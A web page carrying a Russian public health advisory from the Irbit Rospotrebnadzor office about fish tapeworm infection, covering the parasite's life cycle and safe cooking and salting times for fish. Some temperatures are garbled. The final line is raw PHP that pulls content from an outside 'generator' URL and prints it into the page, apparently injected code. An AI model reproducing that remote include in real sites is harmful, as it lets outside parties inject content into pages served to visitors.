Регистрация нового пользоателя


Летний лагерь Салют 2010 год
Летний лагерь Салют 2010 год
Дифиллоботриоз.

2013-09-13 11:54:00
Дифиллоботриоз.

Дифиллоботриоз.

      

 

 Дифиллоботриоз, как заболевание,  является результатом заражения  человека ленточным паразитом  (широким лентецом);

 

 

 

 

Поселившись в кишечнике  человека единожды широкий лентец может проживать в нем до 20 и более  лет.

При этом он оказывает  на  человека разностороннее патологическое воздействие и без лечения решить проблему освобождения организма от данного паразита невозможно.

Самоизлеченности при дифиллоботриозе не регистрируется.

 

Цикл развития широкого лентеца.

 

Яйца из кишечника человека выделяются незрелыми и их дальнейшее развитие  предполагает наличие водоемов.

Если яйцо попало в водоем, то при благоприятных условиях через 2-3 недели в нем формируется первая  личинка ( корацидий), которая выходит из яйца и свободно плавает в водоеме до тех пор, пока не оказывается проглоченной первыми промежуточными хозяевами – вислоногими рачками разных видов и отрядов.

 

В кишечнике этих рачковкорацидий сбрасывает ресничный покров и проникает через кишечную стенку в полость тела рачка, где в течение 2-3 недель переходит во вторую личиночную стадию- процеркоид, причем  в теле рачка таких процеркоидов образуется до 20 штук.

Когда рачок становится добычей хищной рыбы или ее малька,  обычным путем через кишечник  процеркоид мигрирует в различные органы рабы.

 

Через 4-5 недель при благополучном для широкого лентеца  стечении обстоятельств , процеркоид превращается в личинку последней стадии –плероцеркоид,  у которой уже сформирован головной конец с щелевидными присосками, благодаря чему он очень крепко держится на поверхности тканей рыб.

 

Таким образом,заражение человека широким лентецом происходит только при употреблении в пищу  зараженной плероциркоидами рыбы.

 

Человек является окончательным хозяином широкого лентеца, поскольку плероциркоид, попав в  тонкий кишечник и  прикрепившись  к слизистой оболочке , через 14-30 дней становится половозрелым, начинает расти и выделять яйца.

 

Как защитить себя от  заражения широким лентецом?

 

Самый надежный способ- это качественная термическая обработка рыбы.

Плероциркоидпогибает уже при  температуре 55 0, поэтому , чтобы избежать заражения, достаточно  обеспечить  соблюдение температурного режима при приготовлении рыбных  блюд.

Рекомендуется,  если варить рыбу , то небольшими кусками не менее 20 минут с момента закипания; если ее жарить, то только в распластанном виде , также небольшими кусками и также не менее 20 минут.

При посоле  возможность сохранения  плероциркоидов  в рыбе и икре  значительно больше , чем при термической обработке., поэтому  совершенно необходимо соблюдать регламентированные режимы.

 

А это значит:

- крепкий и средний посол рыбы  при массовой доле соли от 10 до 14 %  рекомендуется проводить при температуре 2-40 в течение 14 суток;

- слабый посол при массовой доле соли 8% — при той же температуре , но не менее 16 суток;

- теплый  посол икры в 12 % солевом растворе  при температуре 15-160  может осуществляться в течение 30 мин., в 10% растворе соли – 1 час, в 8% растворе соли – 2 часа, а в 6% растворе – 6 часов.

При охлажденном посоле  ( при температуре 5-60 ) применяются те же  концентрации соли, но время экспозиции удваивается;

Горячее и холодное копчение, вяление, сушка, а также,  консервирование полностью обеззараживает рыбу от личинок широкого лентеца.

 

Среди профилактических мероприятий большое значение играют факторы социального характера, к которым относится, прежде всего:

 

1. Санитарное состояние населенных пунктов ( городов, сел, деревень, дачных участков и пр.) обуславливающее степень загрязнения  прилежащих водоемов фекалиями и сточными водами;

 

2. Хозяйственная деятельность населения, его привычки и быт;

 

3. Доля рыбопродуктов в рационе питания и способы их кулинарной обработки;

 

Мы должны думать о своем здоровье, знать  о последствиях для себя, к которым может привести неразумное наше обращение с природой и стараться избежать их.

 

Будьте здоровы  и  счастливы!

 

 

Ирбитский территориальный отдел

Управления Роспотребнадзора по Свердловской области.




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>